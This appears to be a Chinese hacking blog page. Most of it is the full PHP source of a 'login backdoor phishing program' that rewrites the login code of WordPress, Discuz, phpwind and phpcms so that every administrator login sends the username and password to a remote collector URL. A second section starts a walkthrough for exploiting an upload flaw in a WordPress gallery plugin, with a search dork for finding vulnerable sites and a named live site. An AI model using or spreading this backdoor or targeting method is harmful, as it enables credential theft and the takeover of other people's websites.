wordpress漏洞

登录后门钓鱼程序 V2.0

此版本中相对1.0版本加入了接收端mysql存储支持。

自动插入后门端加入dz和wordpress的支持

代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
<?php
/**
+-----------------------------------------------------------------
* 登录后门钓鱼程序 V2.0
+-----------------------------------------------------------------
* 功能介绍:
* 本程序会根据所选cms和BBS系统自动插入钓鱼后门
* 后续将完善支持PHP的主流的cms和bbs系统
* 本程序仅供学习参考,请勿非法用途 ,请保留版权信息
+-----------------------------------------------------------------
* 作者: Return Blogs: www.creturn.com email:master@creturn.com
+-----------------------------------------------------------------
**/
error_reporting(0);
$rHost = 'http://192.168.1.199/MyProject/server/sever.php'; //定义接收地址
$pUname = 'uname'; //远程端接收用户名参数
$pPwd = 'pwd'; //定义远程接收密码参数
$error = '';
/**
* 插入代码
*/
function inSertPwdDoor($cmsCode,$relPath){
global $rHost,$pUname,$pPwd;
//读取用户名密码特制
if($cmsCode['mothed'] == 'post'){
$rHostPath = $rHost.'?'.$pUname.'=$_POST['.$cmsCode['uname'].']&'.$pPwd.'=$_POST['.$cmsCode['pwd'].']';
}else{
$rHostPath = $rHost.'?'.$pUname.'=$_GET['.$cmsCode['uname'].']&'.$pPwd.'=$_GET['.$cmsCode['pwd'].']';
}
//获取插入代码
$keyword = $cmsCode['keyword'];
$replace = 'file_get_contents("'.$rHostPath.'");'.$cmsCode['bedeck'].$keyword;
$loginPageContent = file_get_contents($relPath);
$loginPageContent = str_replace($keyword, $replace, $loginPageContent);
if(file_put_contents($relPath, $loginPageContent)){
tipAmessage('成功插入!');
}else{
tipAmessage('插入失败!');
}
}
function tipAmessage($msg){
global $error;
$error = $msg;
}
/**
* 各类cms登录标识码和文件路径
*
* $code说明:
* $code['keyword'] 关键字,就是要插入代码的特征码
* $code['bedeck'] 修饰符用来修正代码的外观
* $code['uname'] 用户名变量名
* $code['pwd'] 密码变量名
* $code['mothed'] 密码提交方式:POST 或者 GET
* $code['path'] 登录文件路径
* 注意事项:
* 由于登录口不同程序可能有多个登录方法,正常登录
* 或者ajax或者第三方登录,所以登录点的关键词必须找准
*/
function switchCms($cmsName){
$code = array();
switch ($cmsName) {
case 'phpcmsV9':
$code['path'] = 'phpcms/modules/admin/index.php';
$code['keyword'] = "showmessage(L('login_success'),'?m=admin&c=index');";
$code['bedeck'] = "nttt";
$code['uname'] = 'username';
$code['pwd'] = 'password';
$code['mothed'] = 'post';
break;
case 'dedecms':
break;
case 'dz':
$code['path'] = 'source/class/class_admincp.php';
$code['keyword'] = "$cpgroupid = DB::result_first";
$code['bedeck'] = "nttttt";
$code['uname'] = 'admin_username';
$code['pwd'] = 'admin_password';
$code['mothed'] = 'post';
break;
case 'phpwind':
$code['path'] = 'admin/admincp.php';
$code['keyword'] = "$REQUEST_URI = trim($REQUEST_URI,'?#');";
$code['bedeck'] = "nt";
$code['uname'] = 'admin_name';
$code['pwd'] = 'admin_pwd';
$code['mothed'] = 'post';
break;
case 'wordpress':
$code['path'] = 'wp-includes/user.php';
$code['keyword'] = "$user = new WP_User($userdata->ID);";
$code['bedeck'] = "nt";
$code['uname'] = 'log';
$code['pwd'] = 'pwd';
$code['mothed'] = 'post';
break;
default:
;
break;
}
return $code;
}
if(isset($_POST['creack']) && $_POST['creack'] != ''){
$webRoot = $_SERVER['DOCUMENT_ROOT']; //当前目录
$dir = isset($_POST['dir']) && !empty($_POST['dir']) ? trim($_POST['dir']) : '';
$cms = isset($_POST['cms']) && !empty($_POST['cms']) ? trim($_POST['cms']) : '';
$cmsCode = switchCms($_POST['cms']);
if(empty($cmsCode)){
$error = '没找到可用CMS或者BBS';
}else{
$relPath = $webRoot.$dir.$cmsCode['path'];
if(file_exists($relPath)){
inSertPwdDoor($cmsCode,$relPath);
}else{
tipAmessage('没有找到该文件路径:'.$relPath);
}
}
}

Wordpress Fancy Gallery Plugin 1.2.4 漏洞利用

睡觉前习惯性的上http://www.exploit-db.com/看看有没有什么新出的漏洞,

刚好看到一个Wordpress Fancy Gallery Plugin 1.2.4的上传漏洞

额,其实如果是注入漏洞的话我就不看了,上传漏洞一般就是直接能够上传自己的shell后门,这样比较省事。

先找一个有fancy gallery plugin的漏洞网站,google关键词:inurl:/wp-content/plugins/radykal-fancy-gallery/

随便点击一个进去看了看:http://progressivepulse.com 发现这个网站确实存在此插件并且有列目录漏洞